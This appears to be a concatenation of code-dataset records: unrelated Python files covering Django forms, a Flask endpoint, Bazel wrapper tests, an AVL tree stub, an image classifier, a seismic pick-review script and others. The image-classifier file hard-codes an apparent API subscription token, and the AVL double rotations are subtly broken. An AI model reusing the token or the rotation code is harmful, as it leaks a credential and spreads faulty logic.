None\r\n super(GroupForm, self).__init__(data=data, initial=initial)\r\n\r\n @property\r\n def instance(self):\r\n return self._instance\r\n\r\n def clean_website(self):\r\n return self.cleaned_data[\"website\"] or None\r\n\r\n def create(self, creator):\r\n if self._instance is not None:\r\n message = \"Failed to create group: this form is bound to an existing group.\"\r\n raise ProgrammingError(message)\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n instance = Group.create(creator=creator, **self.cleaned_data)\r\n instance.save()\r\n return instance\r\n\r\n def update(self):\r\n if self._instance is None:\r\n message = \"Failed to update group: this form is not bound to a group.\"\r\n raise ProgrammingError(message)\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n if self._instance.uid != self.cleaned_data[\"uid\"]:\r\n message = \"Group uid is read-only, and cannot be updated.\"\r\n raise ProgrammingError(message)\r\n for name, value in self.cleaned_data.items():\r\n if name != \"uid\":\r\n setattr(self._instance, name, value)\r\n self._instance.save()\r\n return self._instance\r\n\r\n\r\nclass PrettifyGroupForm(forms.Form):\r\n\r\n background_url = forms.URLField(required=False)\r\n logo_icon_url = forms.URLField(required=False)\r\n\r\n def __init__(self, data=None, instance=None):\r\n if not instance:\r\n message = \"Failed to create prettify group 
form: this form must be bound to a group.\"\r\n raise ProgrammingError(message)\r\n self._instance = instance\r\n initial = {\r\n \"background_url\": instance.background_url,\r\n \"logo_icon_url\": instance.logo_icon_url,\r\n }\r\n super(PrettifyGroupForm, self).__init__(data=data, initial=initial)\r\n\r\n @property\r\n def instance(self):\r\n return self._instance\r\n\r\n def clean_background_url(self):\r\n return self.cleaned_data[\"background_url\"] or None\r\n\r\n def clean_logo_icon_url(self):\r\n return self.cleaned_data[\"logo_icon_url\"] or None\r\n\r\n def update(self):\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n for name, value in self.cleaned_data.items():\r\n setattr(self._instance, name, value)\r\n self._instance.save()\r\n return self._instance\r\n\r\n\r\nclass JoinGroupForm(forms.Form):\r\n\r\n request_message = forms.CharField(required=False, widget=forms.Textarea)\r\n\r\n def create(self, user, group):\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n instance = Member.create(user=user, group=group, **self.cleaned_data)\r\n instance.save()\r\n return instance\r\n\r\n\r\nclass ReviewMemberForm(forms.Form):\r\n\r\n _APPROVE = \"approve\"\r\n _REJECT = \"reject\"\r\n _DECIDE_LATER = \"decide_later\"\r\n\r\n _REVIEW_CHOICES = (\r\n (_APPROVE, \"Approve the request and add the user to this group.\"),\r\n (_REJECT, \"Reject the request and remove the user from this group.\"),\r\n (_DECIDE_LATER, \"Decide later.\"),\r\n )\r\n\r\n review = forms.ChoiceField(choices=_REVIEW_CHOICES, required=True, widget=forms.RadioSelect)\r\n\r\n def __init__(self, data=None, instance=None):\r\n if not instance:\r\n message = \"Failed to create review member form: this form must be bound to a member.\"\r\n raise ProgrammingError(message)\r\n elif instance.is_approved:\r\n message = \"Failed to create review member form: member is already approved.\"\r\n raise ProgrammingError(message)\r\n self._instance = instance\r\n initial = {\"review\": ReviewMemberForm._APPROVE}\r\n super(ReviewMemberForm, self).__init__(data=data, initial=initial)\r\n\r\n @property\r\n def instance(self):\r\n return self._instance\r\n\r\n def update(self):\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n review = self.cleaned_data[\"review\"]\r\n if review == ReviewMemberForm._APPROVE:\r\n self._instance.is_approved = True\r\n self._instance.save()\r\n elif review == ReviewMemberForm._REJECT:\r\n self._instance.delete()\r\n else:\r\n pass\r\n return self._instance\r\n\r\n\r\nclass MemberForm(forms.Form):\r\n\r\n _ROLE_CHOICES = (\r\n (Member.ADMINISTRATOR, \"Administrator - administrator can change group settings\"),\r\n (Member.MODERATOR, \"Moderator - moderator can approve pending members\"),\r\n (Member.MEMBER, \"Member - member can view the group contents\"),\r\n )\r\n\r\n role = forms.ChoiceField(choices=_ROLE_CHOICES, required=True, widget=forms.RadioSelect)\r\n remove_member = forms.BooleanField(required=False)\r\n\r\n def __init__(self, data=None, instance=None):\r\n self._instance = instance\r\n initial = {\"remove_member\": False}\r\n if instance:\r\n initial[\"role\"] = instance.role\r\n super(MemberForm, self).__init__(data=data, initial=initial)\r\n\r\n @property\r\n def instance(self):\r\n return self._instance\r\n\r\n def update(self):\r\n if self._instance is None:\r\n message = \"Failed to update member: this form is not bound to a member.\"\r\n raise ProgrammingError(message)\r\n if not self.is_valid():\r\n raise 
InvalidFormError(self.errors)\r\n if not self.cleaned_data[\"remove_member\"]:\r\n self._instance.role = self.cleaned_data[\"role\"]\r\n self._instance.save()\r\n else:\r\n self._instance.delete()\r\n return self._instance\r\n\r\n\r\n# EOF\r\n","repo_name":"BGCX262/zzheng-hg-to-git","sub_path":"friday/website/friday/apps/groups/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29391112832","text":"from main.function.update_table import UpdateTable\nfrom main.function.update_memorial import UpdateMemorial\nfrom ...model.accou_mdb import AccouMdb\nfrom ...schema.accou_mdb import accou_schema\nfrom ...model.memo_hdb import MemoHdb\nfrom ...schema.memo_hdb import MhdbSchema, mhdb_schema\nfrom ...model.ccost_mdb import CcostMdb\nfrom ...schema.ccost_mdb import ccost_schema\nfrom ...model.memo_ddb import MemoDdb\nfrom ...schema.memo_ddb import mddb_schema\nfrom ...model.bank_mdb import BankMdb\nfrom ...schema.bank_mdb import bank_schema\nfrom ...shared.shared import db\nfrom ...utils.response import response\nfrom sqlalchemy.exc import *\nfrom ...model.currency_mdb import CurrencyMdb\nfrom ...schema.currency_mdb import currency_schema\nfrom ...model.transddb import TransDdb\nfrom ...model.transbank import TransBank\n\n\nclass Memorial:\n def __new__(self, user, request):\n if request.method == \"POST\":\n try:\n code = request.json[\"code\"]\n date = request.json[\"date\"]\n desc = request.json[\"desc\"]\n memo = request.json[\"memo\"]\n\n m = MemoHdb(code, date, desc, False, user.id)\n\n db.session.add(m)\n db.session.commit()\n\n new_memo = []\n for x in memo:\n if x[\"dbcr\"] and x[\"amnt\"]:\n new_memo.append(\n MemoDdb(\n m.id,\n x[\"acc_id\"],\n x[\"bank_id\"],\n x[\"dep_id\"],\n x[\"currency\"],\n x[\"dbcr\"],\n x[\"amnt\"],\n x[\"amnh\"],\n x[\"desc\"],\n user.id,\n )\n )\n\n # print(len(new_memo))\n if len(new_memo) > 0:\n db.session.add_all(new_memo)\n db.session.commit()\n\n UpdateMemorial(m.id, False, user.id)\n\n print(new_memo)\n\n except Exception as e:\n print(e)\n db.session.rollback()\n db.session.close()\n return response(400, \"Kode sudah digunakan\", False, None)\n finally:\n return response(200, \"Berhasil\", True, mhdb_schema.dump(m))\n else:\n try:\n m = (\n MemoHdb.query.filter(MemoHdb.closing == False)\n .order_by(MemoHdb.id.desc())\n .all()\n )\n\n memo = (\n db.session.query(MemoDdb, AccouMdb, CcostMdb, CurrencyMdb, BankMdb)\n .outerjoin(AccouMdb, AccouMdb.id == MemoDdb.acc_id)\n .outerjoin(CcostMdb, CcostMdb.id == MemoDdb.dep_id)\n .outerjoin(CurrencyMdb, CurrencyMdb.id == MemoDdb.currency)\n .outerjoin(BankMdb, BankMdb.id == MemoDdb.bank_id)\n .all()\n )\n\n final = []\n for x in m:\n mm = []\n for y in memo:\n if x.id == y[0].mcode:\n y[0].acc_id = accou_schema.dump(y[1])\n y[0].dep_id = ccost_schema.dump(y[2])\n y[0].currency = currency_schema.dump(y[3]) if y[3] else None\n y[0].bank_id = bank_schema.dump(y[4]) if y[4] else None\n mm.append(mddb_schema.dump(y[0]))\n\n final.append(\n {\n \"id\": x.id,\n \"code\": x.code,\n \"date\": MhdbSchema(only=[\"date\"]).dump(x)[\"date\"],\n \"desc\": x.desc,\n \"imp\": x.imp,\n \"memo\": mm,\n }\n )\n\n return response(200, \"Berhasil\", True, final)\n except ProgrammingError as e:\n return UpdateTable(\n [MemoHdb, MemoDdb, AccouMdb, CcostMdb, CurrencyMdb], request\n 
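                # (added note; an assumption from the helper's name, not documented behaviour)
                # a ProgrammingError here usually means a table is missing, so the handler
                # falls back to (re)creating the tables before answering the request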
)\n","repo_name":"FaaaDev/api.labha.id","sub_path":"main/function/memorial/memorial.py","file_name":"memorial.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22365747515","text":"\nfrom unittest.mock import AsyncMock, PropertyMock\n\nimport pytest\n\nimport abstracts\n\nfrom aio.api import bazel\n\n\n@abstracts.implementer(bazel.ABazel)\nclass DummyBazel:\n\n @property\n def bazel_path(self):\n return super().bazel_path\n\n @property\n def path(self):\n return super().path\n\n\n@abstracts.implementer(bazel.ABazelCommand)\nclass DummyBazelCommand(DummyBazel):\n pass\n\n\n@pytest.mark.parametrize(\"bazel_path\", [None, \"\", \"BAZEL PATH\"])\ndef test_base_bazel_constructor(bazel_path):\n kwargs = (\n dict(bazel_path=bazel_path)\n if bazel_path is not None\n else {})\n\n with pytest.raises(TypeError):\n bazel.ABazel(\"PATH\", **kwargs)\n\n base = DummyBazel(\"PATH\", **kwargs)\n assert base._path == \"PATH\"\n assert base._bazel_path == bazel_path\n\n\n@pytest.mark.parametrize(\"bazel_path\", [None, \"\", \"BAZEL PATH\"])\n@pytest.mark.parametrize(\"which\", [None, \"\", \"FOUND BAZEL PATH\"])\ndef test_base_bazel_bazel_path(patches, bazel_path, which):\n base = DummyBazel(\"PATH\")\n patched = patches(\n \"pathlib\",\n \"shutil\",\n prefix=\"aio.api.bazel.abstract.base\")\n base._bazel_path = bazel_path\n\n with patched as (m_plib, m_shutil):\n m_shutil.which.return_value = which\n\n if not bazel_path and not which:\n with pytest.raises(bazel.BazelError) as e:\n base.bazel_path\n assert (\n e.value.args[0]\n == \"No path supplied, and `bazel` command not found\")\n else:\n assert base.bazel_path == m_plib.Path.return_value\n\n assert \"bazel_path\" not in base.__dict__\n if bazel_path:\n assert not m_shutil.which.called\n assert (\n m_plib.Path.call_args\n == [(bazel_path, ), {}])\n return\n assert (\n m_shutil.which.call_args\n == [(\"bazel\", ), {}])\n if not which:\n assert not m_plib.Path.called\n else:\n assert (\n m_plib.Path.call_args\n == [(which, ), {}])\n\n\ndef test_base_bazel_path(patches):\n base = DummyBazel(\"PATH\")\n patched = patches(\n \"pathlib\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_plib, ):\n assert base.path == m_plib.Path.return_value\n\n assert (\n m_plib.Path.call_args\n == [(\"PATH\", ), {}])\n assert \"path\" not in base.__dict__\n\n\n@pytest.mark.parametrize(\"bazel_path\", [None, \"\", \"BAZEL PATH\"])\ndef test_base_bazel_command_constructor(bazel_path):\n kwargs = (\n dict(bazel_path=bazel_path)\n if bazel_path is not None\n else {})\n\n with pytest.raises(TypeError):\n bazel.ABazelCommand(\"PATH\", **kwargs)\n\n command = DummyBazelCommand(\"PATH\", **kwargs)\n assert command._path == \"PATH\"\n assert command._bazel_path == bazel_path\n\n\ndef test_base_bazel_command_executor(patches):\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n \"concurrent.futures\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_futures, ):\n assert (\n command.executor\n == m_futures.ThreadPoolExecutor.return_value)\n\n assert (\n m_futures.ThreadPoolExecutor.call_args\n == [(), {}])\n assert \"executor\" not in command.__dict__\n\n\ndef test_base_bazel_command_loop(patches):\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n \"asyncio\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_aio, ):\n assert (\n command.loop\n == m_aio.get_running_loop.return_value)\n\n assert (\n 
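        # (added note) the `loop` property should delegate to asyncio.get_running_loop(),
        # called with no arguments, which is what this call_args check verifies: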
m_aio.get_running_loop.call_args\n == [(), {}])\n assert \"loop\" not in command.__dict__\n\n\n@pytest.mark.parametrize(\n \"args\", [[], [f\"ARG{i}\" for i in range(0, 5)]])\n@pytest.mark.parametrize(\n \"kwargs\", [{}, {f\"K{i}\": f\"V{i}\" for i in range(0, 5)}])\nasync def test_base_bazel_command_subproc_run(patches, args, kwargs):\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n (\"ABazelCommand.executor\",\n dict(new_callable=PropertyMock)),\n \"ABazelCommand._run_in_executor\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_exec, m_run):\n assert (\n await command.subproc_run(*args, **kwargs)\n == m_run.return_value)\n\n assert (\n m_run.call_args\n == [(m_exec.return_value.__enter__.return_value, ) + tuple(args),\n kwargs])\n\n\n@pytest.mark.parametrize(\n \"args\", [[], [f\"ARG{i}\" for i in range(0, 5)]])\n@pytest.mark.parametrize(\n \"kwargs\", [{}, {f\"K{i}\": f\"V{i}\" for i in range(0, 5)}])\nasync def test_base_bazel_command__run_in_executor(patches, args, kwargs):\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n \"partial\",\n (\"ABazelCommand.loop\",\n dict(new_callable=PropertyMock)),\n \"ABazelCommand._subproc_run\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_partial, m_loop, m_run):\n m_loop.return_value.run_in_executor = AsyncMock()\n assert (\n await command._run_in_executor(\"POOL\", *args, **kwargs)\n == m_loop.return_value.run_in_executor.return_value)\n\n assert (\n m_loop.return_value.run_in_executor.call_args\n == [(\"POOL\", m_partial.return_value), {}])\n assert (\n m_partial.call_args\n == [(m_run, ) + tuple(args), kwargs])\n\n\n@pytest.mark.parametrize(\n \"args\", [[], [f\"ARG{i}\" for i in range(0, 5)]])\n@pytest.mark.parametrize(\n \"kwargs\", [{}, {f\"K{i}\": f\"V{i}\" for i in range(0, 5)}])\n@pytest.mark.parametrize(\"cwd\", [None, \"CWD\"])\n@pytest.mark.parametrize(\"capture\", [None, \"CAPTURE\"])\ndef test_base_bazel_command__subproc_run(\n patches, args, kwargs, cwd, capture):\n kwargs = kwargs.copy()\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n \"subprocess\",\n (\"ABazelCommand.path\",\n dict(new_callable=PropertyMock)),\n prefix=\"aio.api.bazel.abstract.base\")\n if cwd:\n kwargs[\"cwd\"] = cwd\n if capture:\n kwargs[\"capture_output\"] = capture\n expected = kwargs.copy()\n\n with patched as (m_subproc, m_path):\n assert (\n command._subproc_run(*args, **kwargs)\n == m_subproc.run.return_value)\n\n if not cwd:\n expected[\"cwd\"] = m_path.return_value\n else:\n assert not m_path.called\n if not capture:\n expected[\"capture_output\"] = True\n assert (\n m_subproc.run.call_args\n == [tuple(args), expected])\n","repo_name":"envoyproxy/toolshed","sub_path":"aio.api.bazel/tests/test_abstract_base.py","file_name":"test_abstract_base.py","file_ext":"py","file_size_in_byte":6481,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"5862067502","text":"# encoding=utf8\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.depth = 0\n self.parent = None\n\nclass AVLTree:\n def __init__(self):\n self.root = None\n\n def find(self, key):\n if not self.root:\n raise Exception('empty')\n return self._find(key, self.root)\n\n def _find(self, key, node):\n if not node:\n raise Exception('not found')\n if node.data == key:\n return node\n if key < node.data:\n return self._find(key, node.left)\n return self._find(key, node.right)\n\n def height(self, node):\n if not 
node:\n            return -1\n        # Node.__init__ stores the subtree height in .depth (0 for a fresh leaf)\n        return node.depth\n\n    def singleRight(self, node):\n        left = node.left\n        node.left = left.right\n        left.right = node\n        # update heights bottom-up: the demoted node first, then its new parent\n        node.depth = max(self.height(node.right), self.height(node.left)) + 1\n        left.depth = max(self.height(left.right), self.height(left.left)) + 1\n        return left\n\n    def singleLeft(self, node):\n        right = node.right\n        node.right = right.left\n        right.left = node\n        node.depth = max(self.height(node.right), self.height(node.left)) + 1\n        right.depth = max(self.height(right.right), self.height(right.left)) + 1\n        return right\n\n    def LR(self, node):\n        # left-right case: rotate the left child left, then this node right\n        self.singleLeft(node.left)\n        return self.singleRight(node)\n\n    def RL(self, node):\n        # right-left case: rotate the right child right, then this node left\n        self.singleRight(node.right)\n        return self.singleLeft(node)\n\n","repo_name":"lakeo/practise","sub_path":"avl.py","file_name":"avl.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21711267659","text":"from sqlalchemy import create_engine, MetaData\nfrom sqlalchemy import Table, Column, Integer, String, Text, ForeignKey\nfrom sqlalchemy.orm import mapper, scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\ndburl = 'sqlite:///data.sqlite'\n\nengine = create_engine(dburl, convert_unicode=True)\ndb_session = scoped_session(sessionmaker(\n    autocommit=False, autoflush=False, bind=engine))\nBase = declarative_base()\nBase.query = db_session.query_property()\n# metadata = MetaData()\nmetadata = Base.metadata\n\nusers = Table(\n    'users', metadata,\n    Column('id', Integer, primary_key=True),\n    Column('name', String(50), unique=True),\n    Column('email', String(120), unique=True)\n)\n\nposts = Table(\n    'posts', metadata,\n    Column('id', Integer, primary_key=True),\n    Column('title', String(128)),\n    Column('content', Text())\n)\n\ntags = Table(\n    'tags', metadata,\n    Column('id', Integer, primary_key=True),\n    Column('name', String(64))\n)\n\nposts_tags_table = Table(\n    'posts_tags', metadata,\n    Column('post_id', Integer, ForeignKey('posts.id')),\n    Column('tag_id', Integer, ForeignKey('tags.id'))\n)\n\n\ndef init_db():\n    Base.metadata.drop_all(bind=engine)\n    Base.metadata.create_all(bind=engine)\n\n    con = engine.connect()\n    con.execute(users.insert(), name='admin', email='admin@localhost')\n    for i in range(20):\n        con.execute(users.insert(),\n                    name=f'user{i}',\n                    email=f'user{i}@localhost')\n\n\nif __name__ == \"__main__\":\n    init_db()\n","repo_name":"AngelLiang/Flask-Demos","sub_path":"AD12-flask-admin-sqla-automap-demo/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"35983291304","text":"a, b = list(map(int, input().split()))\nn = int(input())\n\n\ndef solution(a, b, n):\n    [numbers, number] = [list(map(int, input().split())), 0]\n    for i in range(n):\n        number += numbers[i] * a**(n-1-i)\n    numbers = []\n    while number >= b:\n        numbers.append(number % b)\n        number //= b\n    numbers.append(number)\n    return ' '.join(map(str, numbers[::-1]))\n\n\nprint(solution(a, b, n))\n","repo_name":"TERADA-DANTE/algorithm","sub_path":"python/acmicpc/solved/_11576.py","file_name":"_11576.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17052749956","text":"import matplotlib.pylab as plt\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\nmodel = 
tf.keras.Sequential(\n    [\n        hub.KerasLayer(\n            name=\"inception_v1\",\n            handle=\"https://tfhub.dev/google/imagenet/inception_v1/classification/5\",\n            trainable=False,\n        ),\n    ]\n)\nmodel.build([None, 224, 224, 3])\n# model.summary()\n\n\n# Load the ImageNet class labels used by the model\ndef load_imagenet_labels(file_path):\n    labels_file = tf.keras.utils.get_file(\"ImageNetLabels.txt\", file_path)\n    with open(labels_file) as reader:\n        f = reader.read()\n        labels = f.splitlines()\n    return np.array(labels)\n\n\n# Decode and resize the image into the format TensorFlow expects\ndef read_image(file_name):\n    image = tf.io.read_file(file_name)\n    image = tf.io.decode_jpeg(image, channels=3)\n    image = tf.image.convert_image_dtype(image, tf.float32)\n    image = tf.image.resize_with_pad(image, target_height=224, target_width=224)\n    return image\n\n\n# Run the image through the model and return the top-k labels\ndef top_k_predictions(img, k=1):\n    imagenet_labels = load_imagenet_labels(\n        \"https://storage.googleapis.com/download.tensorflow.org/data/ImageNetLabels.txt\"\n    )\n    image_batch = tf.expand_dims(img, 0)\n    predictions = model(image_batch)\n    probs = tf.nn.softmax(\n        predictions, axis=-1\n    )  # turn the raw logits into probabilities\n    top_probs, top_idxs = tf.math.top_k(input=probs, k=k)\n    top_labels = imagenet_labels[tuple(top_idxs)]\n    return top_labels, top_probs[0]  # index 0 drops the batch dimension added above\n\n\nimport requests\nimport json\nimport tempfile\n\n\ndef pred_query(query, n=3):\n    res = requests.get(\n        f\"https://api.search.brave.com/res/v1/images/search?q={'+'.join(query.split(' '))}&safesearch=strict&count={n}&search_lang=en&country=us&spellcheck=1\",\n        headers={\n            \"Accept\": \"application/json\",\n            \"Accept-Encoding\": \"gzip\",\n            \"X-Subscription-Token\": \"BSArCBHslQs8k4GSeCIT_GgG7hVOQIY\",\n        },\n    )\n    res = json.loads(res.text)\n    out = []\n    for i in range(n):\n        try:\n            img_url = res[\"results\"][i][\"thumbnail\"][\"src\"]\n            img_path = tf.keras.utils.get_file(\n                tempfile.mktemp(), img_url\n            )  # the thumbnail is downloaded to a temporary file\n            img = read_image(img_path)\n            pred_label, pred_prob = top_k_predictions(img, k=3)\n            print(pred_label)\n            out.append(\"camera\" in \",\".join(pred_label))\n        except Exception:\n            pass\n    if len(out) == 0:\n        print(\"no image found for query:\", query)\n        return False\n    return sum(out) / len(out) >= 0.5\n\n\nif __name__ == \"__main__\":\n    query = \"Polenta\"\n    res = requests.get(\n        f\"https://api.search.brave.com/res/v1/images/search?q={'+'.join(query.split(' '))}&safesearch=strict&count=1&search_lang=en&country=us&spellcheck=1\",\n        headers={\n            \"Accept\": \"application/json\",\n            \"Accept-Encoding\": \"gzip\",\n            \"X-Subscription-Token\": \"BSArCBHslQs8k4GSeCIT_GgG7hVOQIY\",\n        },\n    )\n    res = json.loads(res.text)\n    img_url = res[\"results\"][0][\"thumbnail\"][\"src\"]\n    img_path = tf.keras.utils.get_file(tempfile.mktemp(), img_url)\n    img = read_image(img_path)\n\n    plt.imshow(img)\n    plt.title(img_path, fontweight=\"bold\")\n    plt.axis(\"off\")\n    plt.show()\n\n    pred_label, pred_prob = top_k_predictions(img)\n\n    # decide based on the top predicted label\n\n    if \"camera\" in pred_label[0]:\n        print(f\"it is a camera ({pred_label[0]}: {pred_prob[0]:0.1%})\")\n    else:\n        print(f\"it is NOT a camera ({pred_label[0]}: {pred_prob[0]:0.1%})\")\n","repo_name":"RikardDM/cameraProject","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25495936427","text":"import glob\nimport 
os\nimport pyasdf\nimport obspy\nimport numpy as np\nfrom obspy.geodetics.base import gps2dist_azimuth\nfrom PickReview.utils import *\nfrom PickReview.nlloc_utils import run_nonlinloc\nfrom PickReview.plotting import plot_scatter\nimport logging\nLogger = logging.getLogger(__name__)\nlogging.basicConfig(\n level=logging.WARNING,\n format=\"%(asctime)s\\t%(name)s\\t%(levelname)s\\t%(message)s\")\n\n\ndef run_snuffler(stream, events, markers, inventory, ntracks=12):\n \"\"\"\n Launch Pyrocko Snuffler to review picks\n :param stream: Obspy.Stream\n :param events: Obspy Event or Catalog\n :param markers: list of Pyrocko Markers\n :param inventory: Obspy Inventory\n :return: return_tag, list of reviewed Pyrocko Markers\n \"\"\"\n if isinstance(events, obspy.core.event.Event):\n catalog = obspy.Catalog(events=[event])\n else:\n catalog = events\n if inventory:\n return_tag, markers_out = stream.snuffle(catalog=catalog, inventory=inventory, markers=markers, ntracks=ntracks)\n else:\n return_tag, markers_out = stream.snuffle(catalog=catalog, markers=markers, ntracks=ntracks)\n return return_tag, markers_out\n\n\nif __name__ == \"__main__\":\n\n flist = glob.glob(\"/home/genevieve/research/quakemigrate/cami/dets_fromscamp_h5/2020031*.h5\")\n for filename in flist:\n\n #print(f\"H5 file: {filename}\")\n\n # Open H5 file and extract event and stream\n ds = pyasdf.ASDFDataSet(filename=filename)\n event = ds.events[0].copy()\n stream = obspy.Stream()\n for id in ds.waveforms.list():\n stream += ds.waveforms[id][\"raw_recording\"]\n del ds\n\n # Criterion for analysis\n reflat = 50.4502915\n reflon = -112.120833\n refdepth = -543\n tup = gps2dist_azimuth(event.preferred_origin().latitude, event.preferred_origin().longitude, reflat, reflon)\n distance = np.sqrt(tup[0] ** 2 + (event.preferred_origin().depth - refdepth) ** 2)\n if distance > 50:\n continue\n print(event.preferred_origin())\n\n # Get Pyrocko markers from previous picks\n picks, _ = fix_picks_ids(event, stream, method=\"modelled\")\n markers = picks2markers(picks, event=event, phase=True, kinds=(1, 2))\n\n # Re-pick using snuffler\n return_tag, markers_out = run_snuffler(stream, events=event, markers=markers, inventory=None)\n #print(f\"Return tag: {return_tag}\")\n if not return_tag:\n continue\n\n # Run NonLinLoc with new picks\n run_dir = \"/home/genevieve/research/PickReview/NonLinLoc/temp_dir\"\n for f in glob.glob(os.path.join(run_dir, \"*\")): # Clean out dir\n os.remove(f)\n fname = os.path.join(run_dir, \"phases.obs\")\n write_obs(phase_markers=markers_out, fname=fname)\n run_nonlinloc(fname)\n\n # Plot new location\n previous_origin = event.preferred_origin()\n previous_origin.depth += 774\n plot_scatter(hypfile=\"/home/genevieve/research/PickReview/NonLinLoc/temp_dir/last.hyp\")\n\n # Save new location and picks in a directory (.hyp file)\n savedir = \"/home/genevieve/research/PickReview/NonLinLoc/save_dir/\"\n dum = os.path.split(glob.glob(os.path.join(run_dir, \"result.2*.grid0.loc.hyp\"))[0])[1].split(\".\")\n code = \".\".join(dum[1:3])\n os.rename(fname, os.path.join(savedir, \"result.\" + code + \".obs\"))\n\n outfiles = glob.glob(os.path.join(run_dir, \"result.*.grid0.loc*\"))\n for f in outfiles:\n fc = os.path.split(f)[1]\n if \"sum\" in fc:\n os.rename(f, os.path.join(savedir, fc.replace(\"sum\", code)))\n else:\n os.rename(f, os.path.join(savedir, 
fc))","repo_name":"savardge/PickReview","sub_path":"PickReview/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4695433416","text":"# Author: Jochen Gast \r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom losses import factory\r\n\r\n\r\nclass ClassificationLoss(nn.Module):\r\n def __init__(self, args, topk=(1, 2, 3), reduction='mean'):\r\n super().__init__()\r\n self.args = args\r\n self.cross_entropy = torch.nn.CrossEntropyLoss(reduction=reduction)\r\n self.topk = topk\r\n\r\n @staticmethod\r\n def accuracy(output, target, topk=(1,)):\r\n maxk = max(topk)\r\n batch_size = target.size(0)\r\n _, pred = output.topk(maxk, 1, True, True)\r\n pred = pred.t()\r\n correct = pred.eq(target.view(1, -1))\r\n res = []\r\n for k in topk:\r\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\r\n res.append(correct_k.mul_(100.0 / batch_size))\r\n return res\r\n\r\n def forward(self, output_dict, target_dict):\r\n output = output_dict[\"output1\"]\r\n target = target_dict[\"target1\"]\r\n # compute actual losses\r\n cross_entropy = self.cross_entropy(output, target)\r\n # create dictonary for losses\r\n loss_dict = {\r\n \"xe\": cross_entropy,\r\n }\r\n acc_k = ClassificationLoss.accuracy(output, target, topk=self.topk)\r\n for acc, k in zip(acc_k, self.topk):\r\n loss_dict[\"top%i\" % k] = acc\r\n return loss_dict\r\n\r\n\r\nfactory.register(\"ClassificationLoss\", ClassificationLoss)\r\n","repo_name":"visinf/deblur-devil","sub_path":"losses/classification_losses.py","file_name":"classification_losses.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"29029383068","text":"ani_book = input()\ncount_book = 0\n\nwhile True:\n book = input()\n\n if book == ani_book:\n print(f\"You checked {count_book} books and found it.\")\n break\n if book == \"No More Books\":\n print(\"The book you search is not here!\")\n print(f\"You checked {count_book} books.\")\n break\n if book != ani_book:\n count_book += 1\n continue\n\n","repo_name":"ilchevai/SoftUni","sub_path":"Programing basic june 2022/while_loop_exercise/old_book.py","file_name":"old_book.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25251445017","text":"import robosim\nimport numpy as np\nfrom typing import Dict, List\nfrom Entities import *\nfrom rsim.Render_gym import RCGymRender\n\n\ndef clip(val, vmin, vmax):\n return min(max(val, vmin), vmax)\n\ndef normX(x):\n return clip(x / 0.85, -1.2, 1.2)\n\n\ndef normVx(v_x):\n return clip(v_x / 0.8, -1.25, 1.25)\n\n\ndef normVt(vt):\n return clip(vt / 573, -1.2, 1.2)\n\nclass RSim:\n def __init__(self, field_type: int = 0, n_robots_blue: int =3,\n n_robots_yellow: int=3, time_step_ms: int=16):\n self.n_robots_blue = n_robots_blue\n self.n_robots_yellow = n_robots_yellow\n self.view = None\n\n # Positions needed just to initialize the simulator\n ball_pos = [0, 0, 0, 0]\n blue_robots_pos = [[-0.2 * i, 0, 0]\n for i in range(1, n_robots_blue + 1)]\n yellow_robots_pos = [[0.2 * i, 0, 0]\n for i in range(1, n_robots_yellow + 1)]\n\n self.simulator = self._init_simulator(field_type=field_type,\n n_robots_blue=n_robots_blue,\n n_robots_yellow=n_robots_yellow,\n ball_pos=ball_pos,\n blue_robots_pos=blue_robots_pos,\n 
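                                              # (added note) these poses are placeholders only;
                                              # reset() immediately repositions ball and robots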
